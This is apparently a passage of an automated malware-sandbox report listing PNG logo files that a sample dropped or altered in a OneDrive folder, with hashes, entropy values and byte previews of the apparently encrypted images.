C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.contrast-white_scale-400.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3872
Entropy (8bit):	7.947114201738316
Encrypted:	false
SSDEEP:	96:Ec+4M9aC9Sg8Hc501B7alQH8XCGIcleUlIjvhmyFXV+F:Ec+4jCbp5e7gQxGIcleYIr9IF
MD5:	0F95AF6AE061D8E673EEB164F552D8B2
SHA1:	1F3AD277D3D8BCF5AFBFF738E0B8F2D64549FE1C
SHA-256:	CBC6C0C2A42D396EB64DCAE5F7AC67B882E7229275C6CBF5E59669714BCD4DBB
SHA-512:	2CEDACD4CE9D64EBBB28C5F6AF6E0111BDFB87A9B54B7299DFA9A02F9E20A1F42EF120248E5FCB3CC6A246865077050E2EC69EDD0AEE8D8C6B9FA5BA2CC11C8D
Malicious:	false
Preview:	.PNG....UZ..E6...7..y..1i.....j....c3.f.....}Qv.....e~5....'..VU...".O....B.!..@D...T...z..`?p..>..R.d}$.X=.29..}..dm.....4.oRJ...VD.z.+.....M..6.. ...0....{g..4.......n.O?t.8..e.J.~.'..-..n.?.2-h.K....x..../sy..e-..+.95...`b.?........(....x........"...,R]o.;5.J..G.c .v%?.....qF.1?#.{w....b\|..9.......j.&.f.).#J^!.......H..cLWh..bt`.Y.Y...:.6.k.............4R.t.[p.u..........7_@..../q.fLK..V..x>^..6K..L....'....4.R..?.N.o3..'..<.:h5.6..P.p]..m...{?.9.f..S....Z...Ha.....z.....mSlW.z5y.../.....D...td.....Y2..%J.....A.......@dl..6..w.+...L.P..D..}..Uf7........v....w..".k?.u..$...k..@/.nC.h....m..AZk..2T...i.,.:/....Yz..{w..bf..9...../.V..........Z..c......Z.[.e.@.j.-g..l.}.5.J+....".k.Z.@........H..3..6.0@^..'....H....=@[..Z:Q.f.\.D.2K\..]..%<qs.uo.pC,...X.=t....\|.......K..C.q.!1#Bn.;.p.....I.../.m.S..6!^R...&k3.6..4..'u..Z.K....P.....Ag.(!q...Q........jN.d..a.H........#y{....Q..+...'D.dAU.$..../.a.L`..5J.y?............q..U.z...J.6.r..'..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.scale-100.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	986
Entropy (8bit):	7.780238753249765
Encrypted:	false
SSDEEP:	24:07Gu8TgNZZS7EjxDyjFRwyCKDU+tYHR0UZbD:07HNZEADyjTwyCKY+tYm+D
MD5:	C7481DBCA1E6ADFD5C949B106331EA88
SHA1:	63E97CA5A89E35A025686E341A1B76BB9A5F3CC6
SHA-256:	4D30660E842FB3C14E9DE90D5E8C1AE2F5A235D95253F2A8305F6B60332A4150
SHA-512:	729411B7F797005ED5AABD84A5EB47D05931D253D4D4AEB09CFE467965EF9E1678FDA63608B17CB9A8A598B9078701606724A1F0B31F219760B3ECEBBDDAB3CC
Malicious:	false
Preview:	.PNG....w.zT.q...X@Z..D".t...g.f...m./X....P..(......Gd1.3......~8Z..^.<..O.M..t_..e.j?..q.. .C.'..'....d.....O.7X.....%..$.i.MD.R.H..E.C+...;.~.....:$.%....n&..N...d..j.}lL..2e.D+.KnH.U.(...w..0.+F\|....d.Qa....=...R8...!R.6...<c.}......dgzWe.K.?"H../v(g.l...d.........@~.....0X.\|.....>..G'R!.I.......P.%.6..Z.Fx.-Sr..[....Vt.39e.w.........i.u'.h.a.E0.....2.}.........T5\..A;.=M.$.?..g.L@tT.H..G..~.P...-o.P..5...`z.L.......6a....Z.u....Xg........U...z...y.0e9w.a..i}...mIx...'y..y%).&.....[.+.m..L..(Xe..o.M...;w7....ni.'Yu.T0.,......G.K......2.\.&...\C.jT...@.].......B....a...<.../Ap.4?.j.y".<.\.}.#..&c../.B.f.z.b..g.=....p..}....D......tM'..rA..Ss...b.....v=C....+..j.(...99..2!i1."...::S[Ox..e.#..P...Db......K...w....=......._.,.dj.<.%1.t.y.....xU.E.]x.....AyC7..,z.......2......:.QW...j{F..o..1...j..'...85..>..........Zdnr....qbi..Uu.6....._=..UC`Z]^....K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.scale-125.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1182
Entropy (8bit):	7.812560557654242
Encrypted:	false
SSDEEP:	24:8v8C6NbFVatFbzFDikJL46gRANnmbjxEre7hua5z2e/z+pI24qOi0bD:cRubF8tF/FDvJF+AijxES1jSCieD
MD5:	779CE4CCE44249500FC6D91336EC70A5
SHA1:	F0D9EC2ADF22286A65452A6CC26F73840B4E48F6
SHA-256:	4AA19A1A3D26AA8263A820E6BA8EB99A8DE19539808B36DD96EE4C7D9378C27C
SHA-512:	E2AC5B4BD66E918EA5AB1320B214A0976D2135E66355B01E7FC03451F5F6F8383A5FD30801ABC2FBC3BA010FE6B4911411315183F22F9C4BEFB023D68FC66550
Malicious:	false
Preview:	.PNG.SU..-..k.~...B...r....6,6[rw`.j.)'.{...opbf.J..... c.q.hW. .arZ.@.}...<.C.?.X........E..l.i.........,.Z9..3K>...U.W.......Y..f ^....q}..E..-5...%...B...&j..kcIa~}..l.g..$....}Q..y..<......+j.......e..Ig....c......'..-;}WX..O@....B..=.q!A..g..cNk..W\..R:bO...`...y....0 .....r@%...0..ks./...-.....5.T.3Z.Z.......I..V.]..&....tc....j..E.<C.h.WRWn.....d.g...GK^..;.."p+..o.....gA.........U.x....V.....3..e....R......U...c..i.;...R..F..]raC.%....wUh.=z.". ....x3~3g/......V.......m.<(.-R.0[..3Z...H............lg...JV..2..VF.]....P...../..p..lT.c.\|wy.T..}Hx.V...T.....#...1.b.F......1.}.yL.`.......1..c....IG.[....".._.......AD.<.Y`....@M/!\|..5.-.._2&.GB.2..r.\..kX......(Z.l..ha%Q.0'.f.x4h..2^<Na....+..0n.cl5R.2.......x.....G...F)[....>.NB'.......<.uI]N.<_..B8)w~.rp.....2.v.<}.-....y`..^+wI.......Au.s...}.k._T<..P.\|.1L....-....(p.q,.&.j..V..._..........Y...`..4.........]d...j.,.R...f!].Z[..Z~.[.Z...h.F........e..?.N;.....9....:.....

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.scale-150.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1324
Entropy (8bit):	7.834326400201924
Encrypted:	false
SSDEEP:	24:PGVZ+/KOGbankFXh8ANq7mC9npe9sGrO5tpIsZTNqJQ5k9pdLRwBpAZT2kpf3mpX:4+/jkFQ79npeqGKes7qq5k9HL4pA9Lpw
MD5:	092516B53EF57ABB60727311548694C6
SHA1:	A9BF1D7AC867C5F26FBB20821F31FEA18266CF8E
SHA-256:	BE55879A20017935564A391E43CBEA58DED45555B618F043F566115EC33A1B35
SHA-512:	8154366D1E780EFBF53C2204C0F5AE4207DDE4D4EE10B2526BE583D8CFE167989362CBEF9D3E97431C3CFF332736B893C1EAAC751B3BB2CD714CE09806C98295
Malicious:	false
Preview:	.PNG..e...C.L...1....&.....[W....w`}......e...7....(.)i....\|.)U{..i...tW~.W ......P.P^...r..4..(.qG#+...%.~..0(>.H.s....%n.L.b".(.K..:trw..M..=........6r..}.......f...5..U..X.#.Df(H,0..Q.v.......qYt.#P...>X..k..WK...4.;...J~.`...P..aThO.=...S3...B?.TT.../'..6m.c..8D\p......M(x...X.. .V0p].&i...?....6....a.+#....O.?.sj.;..z/....R.Mk...E%....3lN\|\R..=...zw.......Z'...L..3......a.._..../..w........'...6a..y&._2....9....<...G...d...>s.. .YfeG ..eH........H.l..,.B(i..P4.wE....%.e.<cs.Q.<.DP +....S.2....c."1aQ&.A}...N..z................L.If$...Q..\G...f&.v.....C..j.K..b....PU/.W.7r .....q....@{$dM.H..~....=..,.!..1...oGT..C.'.0.......6........gF.y...IqL.\.5.!..I\|..Q.$.N.3...&8..6..ft.AO7.....Q...W?.'m[.........18..("..9q.]6(.R9.....YZ.U{.7...t.MYWM..Ka..=UJK.V....I..b.!d..C..B.F.i.eG#}......5$!..Z.KP.r..f.@.go.H...5.x..^....Z.C.......Hd.;...'Q....K..O..p..O."D1..rI{...q..xP.......!w..e...-.................!..S.T...xB...q?..z...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.scale-200.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1726
Entropy (8bit):	7.8829634022515105
Encrypted:	false
SSDEEP:	48:9TOe0F+Nh4jdbK6060hb6Y7n2jLoKvpiPimPnD:dOn6h4NK6HunO7mPD
MD5:	07B90E0B7EE85DC3F862BC3BCD7AC1F9
SHA1:	AAA54460560BECB252C984B92C2136D0A438C278
SHA-256:	823A265A08FEAE2BD5FADA18D5B0CA9A3DB965819D732BA90E80759A34F721CA
SHA-512:	40D91ACB14998D2529E4B74AF035F6A8F5F22442383C20C82A55891A4945ECDB03F085801150CFEB5989B9D5BE77453BEC88FCA9DADB7199C1268AAE28980EAB
Malicious:	false
Preview:	.PNG......."......T...%.tb^xEa.C#.~.9..4....U........n0\.&i....s.."..h.A..y.[%LWs...Gc.0!:.n..E!.%.@.]...;..'...9Y.f3..~.z.._<..W.J.K....1.f..8..D.1gU...\C...!...2rqT.`}Km.9.q....P!..g4....;g.^.....j....U..yA..AP..oY.[.\S...LUy.A..Oq4....D...4.....0-`3.....a.4.....z...bB.r....o..c_.-....].`.......J/........G..,G..$D.Mq. ./..BO.....-..2hD..a....EM...l.-@.P0.{...P......N..."=...^..GG{.....X7...V.....aVTq...n..]...R.8.1...+.i..+...Q..G.....a..A<V...m..E...(..4O@.^..V.....Ru..T.?..Cd..........G}..7.V...{......v....JU.p..Y[.o.R..nsa....O5..dL...=...n...<..S.....-......~fX..T.Ls...]KV.-..T...$rd..0....]..b.........E.....5..."....5.j.93V..N.K...Y..............Q.@H.......k\.W.cw..c.....-.;......n.mRDR.. .f.5,..F.....9.;MI......op..K...U..X#....NsJ...;6..i..T.''...x)...!......RS.<..%.....k..]..s..K+.I<8K.Y....X!..Y...n....36.....iR...&\.... .......\|........A.^..fl .X...N".9^;..........v.6i.o.S.Q.Z..).."...v..k..~.O../.NS.KG.Dr.m.3Dn/.<.0.<..k.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveMedTile.scale-400.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3560
Entropy (8bit):	7.942869141706986
Encrypted:	false
SSDEEP:	96:MWDL1q5W8JXRvlXWKoqiNE+odNAlLfnDBm25eRH:MGeW0XRvlXWKojE+oTGDBJ5eRH
MD5:	46BA87FAA1DC778C9719C25327D9BF3A
SHA1:	E12B38EF8C0A72532D2F6B6B2230274ED6A44DA5
SHA-256:	3F4332999E3E0B69009D2CC1BABE6C3F033A71481146382DAB1152248ED36D83
SHA-512:	CD24BACC55C57B49BF942FB4AB7F113DAF53EF4A287CD268FCF5C2812E064DC8AB2BC1CEDEFEDCA7FBA44DBD86E3ABB4DFDEAAE87B07EC7C8BECA6BDB30B64B2
Malicious:	false
Preview:	.PNG........sN.2.HZ.'...!u.uhb .d.......wh;5Y4...........]4..\|.9V._.P...31.....2...".%../...Wjo.n....(.=h=>.....-....SX..d.v.D.......1`P{....$...m.o.].....A..x).\j#.......&..._1.m....fH.}.)vv..7.5.F5y.c.(1J.s.:.#.v..u.gV....~..i..7lz...!pb\.jD..U..u.n.......up.....T.}l.H..eE..+.)c..LG<..w.. ....U.{..#..O}.e....H...7....h...Q...5.0...d.wdCb.Eh...5..W..}....TP..........._.y.y..U..&C.#<..q.....?..P......9=.....{+..Y'.].C!N......V`..No..........s.......e...6..z..J..bp.._=]..-D.$..z-3...d..VK.nb....T.P.1..M.lJ..o....]u.!..~....a.?=(.....P..L.I...,.=v>..Bw./.4.E,.-..I!...`..V.......PK.8...'..r$..pM.D...~..!....V.4u.....f.d.T..=j.\|.I..d..V..$...._.l.aQr..j....s...:?w.....y..J.N"...8.+..]i...5.R.#.....&...3..6.....>...h.$,b.f5..cy........O...H.(&3.... ..a.+...}V.w.4.b.jr.YAC.....r.EGP3.@.`p.G....#s........?.&...A<.F.-.A.......P.g.y.lG.. eQ.;.E..[.._..J......g...U.."..~$...R.L_S..%..l...E..j.a..4UH-......;)\|......]!S.U.Ra;N.n..[.V.#}.6..>G..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-black_scale-100.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	747
Entropy (8bit):	7.698999095499111
Encrypted:	false
SSDEEP:	12:M8pVchvQTyzrwSLXULy+cdcJKrimQa1Q2A8x1CDtcii9a:9khvQT4JL+9KrimQa1pT1ibD
MD5:	623AC05AB7AB353BED87F88E2BA4708D
SHA1:	6683D86F6983238E64FEA38D9E1826D5F9D9A4F2
SHA-256:	386949D35CD032AC084ED16E338F1A5756AA0617AB1FF199120997B40361C940
SHA-512:	36E73593C60BA9C7FB43C25ADFB110672533083DEF0B074E5CEC9D909950FFA5977D11749C620E9C8D2B7598BB375DEF8D4285A503F94B706054B74FC85017B3
Malicious:	false
Preview:	.PNG.lOC... E..4...D+..S..(4.{.}.~.U..........x8.Tfdm...DmHc..a.).0.X........Y.J.W..'....p.Fp..elZs..f.`...9.Jy......MC......u.."J.V..q`L.....H\|.<wyo%p..D8...P.^..U...'..S.......`J^g+...YF...j.8..C.X....bR}.8.7.j...9C8>.X...........s5..c.%.nZY...B...;l....,.>/....}-<%RQ....Q...._P..........t.=mL.@...g....Sv18 .R..<....<.^B..&...E..dO....c.....8L..H..!H...qc.o ..........yB.C{;...t..D..+.Y......?y&..,.N1.~e..M,..."/...$`.2t\|....,n..vg>..37..I...i..h.............;.<.4\R`.&zK..\|u.....Tc.......o^..YA..=..h..,i)....i.'.....L.O.s7....J.EM[^...G.X..ht+.w....\i..W5.;.[..\.&kb%..f8...d.eG@......y..L..<../...8....M0.*...u.k.....y....-.Q.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-black_scale-125.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	859
Entropy (8bit):	7.724159636139554
Encrypted:	false
SSDEEP:	24:nEsZKI2pTUQjoHM2Ob4/W7Vu3fgX+aFbD:nHT2p4BdW7Vu34X+ID
MD5:	3AE30156D2C38556F0D395A119FE59DA
SHA1:	D43C39C13079AFA3E65F1DFE8ECCF29A4189B08C
SHA-256:	A4A7C74355C2749AE65769369324880CBAD1CBBDD7EE54D3ED20B411E554AB27
SHA-512:	91277AD88B3FB7AFD35DE37EE220BD00E150AFB9CB5F99DA6C639461AFCC276073E00C4816CF0C77F99154002229FCFF71C921B842C8E8AB503A970B0A1C842E
Malicious:	false
Preview:	.PNG..:S-........0..eP.N.....2Gz7..Y\G........]S...ilz'@y{.D;T.......G1.{:z....C...~Q.t;.._..<K..#o.]Y.qmb.a.O...8.y..\....?.w%.{.W..-.aO..}C!....B..7".....Fi=\|^....e).....=@.....qo..=Ae....Q..{..^.=.-h.cy..UeK.i....5..#.24.^.8E[\|....d...g.....@.......).?.........L......wP$.2...bmA..Q)A...R..Dp..'.<.k.....K:.@.....x.f...4Wu..s._.......k..4...}........,..feG....=.#..uV..&..v.yDc..]..c+...-&R..^.....Cm....I.k>lKQ}.ZFy!9..A..B(...w...h.A.M....u....-a.j.{POE\.af.Pn^..'.7lu.fX..P.^#.9......x.3z.r..{.E2..'....oa..X>+.d... a/H6V.<..'...FT..P....^o....X.w.c.....,.3..x.4.o.A.....jFh.S;....A.q..,..x..o...T..z.S.!......Mb..W...Y.^].....f...(.~fxL.L......=~..N...>bM..6D.y.e.:..j.D.d.P.Q.b..>X.%.....?\..I..n...rH..rQ....UQ.....M..f....D.r.v.e.......K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-black_scale-150.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	925
Entropy (8bit):	7.781747541186078
Encrypted:	false
SSDEEP:	12:LZVqjBlTyJm90T+1EyznckxX2NoyzVLmwovejemHjelwlYAzHc4KmdNDMUcHKjCB:Lvq/nWTiznckiL8m2QYejcqWAIbD
MD5:	E8DCAD6FE7FABEF95ACD8752A85CF612
SHA1:	AF6AA94B41DBD29F60D2D323EBCFBE723C8CF595
SHA-256:	E98998574B68EF51B3C9F7798DB17C060BAB1C1483179E7EC2A71DFC086C9BFE
SHA-512:	4A17E8888D7F024AB9A7773A196EA30CF77BE5E8C3A47F94C19D817EE126E5772CADF35C17D32E40BD0999A409C55FBC5FBCC9CBCABCC6776F4EC4209AC13A1C
Malicious:	false
Preview:	.PNG...*X.&..2.."...h.HP.....CW ....k.....;i......A..V3..2....l.)&`.2...[+..3.I..".@......'...'....^..z.....0\..>....=./.....{...f.P.3......b.. e[..H...C..2DV......#Q..._.....>.Kf.Y...`43....N..0s..J.R.#g...(.:.8..................cc.z.k.l...&.... ...D...e..-..g..@e-..m.p8B._...G...M..)....?.....>y......]!...N..l$..Y~}.S...;...x.....).5pH.cf.:....,..if.u....Y/.,...._...>.)lT.O....^8.[h..@a....O.rds..o....{.....#@/E.....='.\]b....f..W.-..i..U.Vq5..Q......,.\|?xDJN.eP6.?...}@\,h.hx.`D.=.p...b)..'...q.. ........"@..\|k.%.......l..\4..".F...q.FP.5W.pz.T.........!V....lx.....5.;...g.........A{.EE..W/#y .\9....R..F....V~.X.l..~..c.......}...+..e.EX5..=.j1..n...6Fz.........xzu...z]...Xc:.C_......'.x.Y.U..............u.m?Dyl;,.I..q.e...,S......;(Q...hb."e.........l.>0...~2.U.gHh...I.2w.\|.. 0..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-black_scale-200.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1137
Entropy (8bit):	7.784251152257605
Encrypted:	false
SSDEEP:	24:V9eZ3aLL6nhI0btp5yrX7WGUhFn3xQXe8bD:uaLQNhTyrX7T83xQXeWD
MD5:	E497678650328BC206CE8301CC2F91FF
SHA1:	AD039D3A705D2280110196436FECFD8EB0546A7D
SHA-256:	3BB136AFBBDF5B53C77A2337EE7943A2AF7EE6471676178FF84061E72D43AE9C
SHA-512:	BC1A28E2862A4884FF8069B3D41A13CE986BAD7CB336E4E2319FB585E0FF9985E2839497D66B7A1C03E48B2E5AEE2E996DD9CDB8A0B60ACBE26AD20A44030A22
Malicious:	false
Preview:	.PNG..G.}.DL1e.@..Y.L..X..C-.......H.=8...s.?.(a..=2.B;o..(.......i...]v..L....%..<K.Jt4^;>B.#...S......".^R.............d0.....;.&5)J...Ex.;Z...eal9..Nue....g..)..i.Z...~.......a.....}..SI....X.r.....o=.]..].%.....<\5P,..K.....Z......z.\|.aEf.Uf&.`.`7^_t...{.{.[..C...nX....CDU.....,i......L...V.M,.&.O.h..P"..-}..7..a07}^...Rm.f.y....'....m.G....j<@......j...29.....u...j...\..\..*I.,...."...9.%.{...i.P...?..T...XrQ&..I.e[.j.D.zk.w..=....-.'...@..-P...v.......1.G{o!d..>....<.^e.k.$...c.v.3.......Cf..f`5...A..0..G.K.X+.F...~...S.>.5.q'..^...&..9.K.;...5.cL.N.;...CNkLw.B.[2.<...p...@f.+q.H..[.t.,.xa..B.=.Fb.+.LDs..=..(..z..E.gC..m.6x.^NW.Z`.x...^R..\i....Jx...\...:.>.....b.._qTZ.z.....8d...Y...p.Le.....(.%...Y.$.R28.Z...f=.'G[.".p....TjP...x...,..........G.4o...X.."...8.pI....t..T.W)T....7..l!......2.h.....xN.......NYv..=....9...A.."..Xj...I.quFwD...n+oo.5....5...e.f.....Q..c)..w.d....<..8`....ww.7.4^.....^7.g;.?_.l.......<)..X@...0.._A.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-black_scale-400.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2054
Entropy (8bit):	7.909617369475631
Encrypted:	false
SSDEEP:	48:z6eAZjfpJwues97ZcGp/eqQAl0BxiG/Pnlb3b36RD:z6Rbnos97ZcSKAAiG/dPQ
MD5:	27F0B08CECFFC0658BEE739F056E1FA1
SHA1:	EFEB56FFA7D485B5BD7EA92FF3B2E7D36EF1CF7D
SHA-256:	D5FA119FC75E9F6906B0082BBAC0559357A3753516E3DDE9B3E8663CE9FC7076
SHA-512:	E639CF1C09DB3D0BF043F6B65866438C4062D716CBB0E0507D2A5A09F7891419B957FCB6C1409038F699265E65980C9F955CA7A23247E3E9AFFE61021A630B92
Malicious:	false
Preview:	.PNG..$..$.....0.o.E.85..;.n./..q....R..w...........h-By.n....^..J.e. ..4y..f......X-W9m....f.5..$..P.~C.Y#.3..2s;...G*. .....3.....(......)e.,V[c.B...s.g......`d.."..H.vm......1Qx...e..5o.Vr._H.c5...I._.....}....mD.S..2k!.....?X..-b..Bun.=...\`....G ..h=..1K`..'>..m..P.V\|..M...\|6..sj_..Bb.'a..Wg.I&.X.sn..Q..m...G...!7X......._...8T...s....J.......9....uV9m....nW.q\|.L....ti......Vv....5q....e#......3M......f.[..2..0c..r.X.N..y..W..H...\.n...O.q...%f.h.T .(.......K....Y.D..\.tv....o.-......vM.}.Ut...<..\.'V..~..] .#....'..[..K.J.W.?.[kW..%_..~.zE.........K..........B..F.~...jN+A.....8.'........h..<.@.U9...R..g.....l.!j..N..~......6..._.t.W..L........&0....O+.^j...Bl. .k....o..8...../......'.q.r........=--..V.CBF.....dH..49\..EN<Nx...4.f.8.....:.y.}...V. M..].....#....r.ku[..\9k.C..w.]..G}U..z...o.o...s.Eb.\|.Mz.SX.u...#!%.....&~.Nj.....0...,..4^.\|hz$O..(.>..se".L^.lV\|..Qc.......q6S4e...".?.).O... )........2....x...cQ.)...<..#:.l...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-white_scale-100.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	750
Entropy (8bit):	7.733440811172364
Encrypted:	false
SSDEEP:	12:bL8rlHCpMnOYTx9rXqaR6KUJyq0OwuULmpArgzgs8vjZYodBm1+T29+fdtcii9a:bSvO+aaR6KmyqPELeDMnbfTzbD
MD5:	CF5FF664981D3FBA0652E71549493216
SHA1:	C4224E542ACB4467ACFC346AB31C916B7705AD46
SHA-256:	C3029741240FC43D4EC0CECE4AD7FAAC11E2BB0ACB655479EA764ECA3760D4FF
SHA-512:	DA1E1C327A45E5383879C61715200B73402DF6657B21E6C53BB43103F8DB113DFB19E698E855546D8DF1CBBF2753D10E6645F6572964B37A70476976DEA1E1E7
Malicious:	false
Preview:	.PNG.._R...).v.l....A.VE1.{V..&.Cx%..............;...8.8.......}...y().Y_.Ak.......r.:i.2mk...........I....Y..w..)R}.8..\|%..L....tJ.$t..4Q..d1....nA..3X.6&-....Z.Y...iy.{U..C"t.X.}..0..m..3U...2...<..W..7../.o!.Rm..U\.....$d.5a..,.q........2.s...1_..n....c....f......5..A".g.....d..V....`..F....uAt..6.@..1~K.Z;...D..zf...8^.=.........=....U..6...F[.g..Ve....A..?.3.N.'.....V.=.F...?#.~...$.U..%^.].+./.X..&#.........nb.......w...=#.)...D)X.../...g............4...u...N.D...W.....X..L.v.Y8.Tm..}.b.pq[W.....7._o..<>....S....]..4R.....E. ...e...s..\|...xa.%>*.Q..a..3?...3...jc....~..k..={.X.;.s...Nr$...d..c[....!]......e.....l...ZH..fXK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-white_scale-125.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	866
Entropy (8bit):	7.727199923427445
Encrypted:	false
SSDEEP:	24:qZ4Zd1czMo9FJ8Cy6C9SsvvTrS7KJXzj9d29hIVBhW3D88QbD:qCZdIMMk3Ie0KJ2nsbWwZD
MD5:	A5CFEAE130D8DD2C2ADEE69B6117957F
SHA1:	D4BD8250DBC0040ADD4C350808414EB54078EE38
SHA-256:	3FEAD0BA3BEAA21F9A5516B1371D143BAC033EB43B2878F9E73CD71806620855
SHA-512:	BF628DCBDB765348EA68CD7EC59BD91EBA007A03C66304122B83671AFCF66DFA06025B619288BACD2BB8F87E48E9E107D5DF352701B879D05FB05CAFCDD83666
Malicious:	false
Preview:	.PNG...$....H(...w.T....\|.7.qs.#dI.a8Y..Y/......7a{.f.Gp\..\|.bZH.9m7o.".,...e..,.3.J..-....'.!....., _............pu..O.r.E.........).v...s}.n\..v..9.:....<A..U...c.6,#..W..n.R.y..t\|..8......%w.J.cU2^.......h....y.[..)....q..1.k8.oTkWe.a.!.y..Pv....Z..T.^...b.W...VN....-;e..Nf.5.<.h....qk.P..}}......Xu.=lb.?...p.y..E.z.xxHj2@$...Qj.B.S%..y...,.v..D.T8................._!.~.."(.}z#.$......\|..R.EA.;....D...&.95......z....7B';..J....XW.+...p.4.Jcm.e.s...q..cI..~.l..82.Q...#....c..!..m.?..=..A....7....o...[..Q7px(Z..L...u.R...Nl......).=.w.U<Gn...C....Z..Al^#.s.....Q....Q..".....*.6...;.......Q...vz...s......1H.(....%.].eZ.E.P....Y..Z..P...!..j....... '.qp.1...}..P......{.7...f....-..7..a.L.{./.D.-4^;1P..F........a].QQ.E.E.%..N.o../Q.....:..y.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-white_scale-150.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	931
Entropy (8bit):	7.782326824513412
Encrypted:	false
SSDEEP:	24:+GKFjWiiLFtw47aprKpW6sbSzpXIjuUO+mX/bD:9KIIrK46sbSNiO+mXjD
MD5:	AAB95FC74DC5B60FB7FFDF2A0F72DD40
SHA1:	511E854DEE763262F535611AC6010EAA51B894CC
SHA-256:	5D82559682C8EFAB0DF24AD3FE5F829D610598913CF5CF77F38BE3A2BCA7DFBD
SHA-512:	939F46B2EE7AA23FFB340C934CFC4E06F4AB074283488DF1E7CA15B65E7E0AF86C08F0A8630588C49137626DF69450CE598F1D30C2FC062D0BB45BD94C543D24
Malicious:	false
Preview:	.PNG.!..........s$..!..O.8W.mp."..#.x..dJ.3..c.)<_....3.J..=.#.L.i_"../.~..CX..U^2uI_.v.r..v.\|...$..$..^...-.!.$.)\.0..#n..f..!.w...P......H.0&.xN...M..}..y......"...tIX{.f.V..}..n....f.:.%P..^kF+.<.`.=.S..uC.}f.Sb...x..U....=..w.LS...B.4.%+6....o..pR.........'.8L.'..m......v,t.IEoZ...1$.....JrT.Y..U..=...s....6S..Z).!........g.f.....2t.:.P].....U.......pY...A..Y.p.......y....@0>....4sW.~.iL`....~..~.7..?.Sr.0...r..EV.6/...T.C.FM.pI.o.$....8..$..:m.f..s..k{..0...!^^..7.;.$.n.:&.....O..u.u./.N..j..sx...[.,1....4..i....U.8.>..J..d<wu.Qn<,h....S...p...s..`y....Oq....i..7:.(Qt..(&y-3.\|.A...93S...0.i].C-...!..1.+....z.s..FYq..i...e.>,..<....\[4Yo`t\..2$.`.+..~.]-.._9a:9.(8.,...,C.....5...Z.?.sU._.....x....:A{.,...:)......$..."[.c..6...p..~..h]...&.......j..+M9..3K...+....}4'..(.I.U8_..Y....*[.W..'..\|@..]OVK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\LogoImages\OneDriveSmallTile.contrast-white_scale-200.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1148
Entropy (8bit):	7.805112216768796
Encrypted:	false
SSDEEP:	24:+f8xvFWz8TlQcJod3tzw9Ah/lbC5NhWqYgWcotU2bD:hxvFPi9ttuAltTgHotZD
MD5:	A6E7C80E62AE3C7B99382EED1A5954E8
